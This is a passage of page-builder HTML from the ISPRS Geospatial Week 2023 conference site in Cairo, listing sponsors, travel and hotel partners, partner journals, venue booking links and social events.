height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" 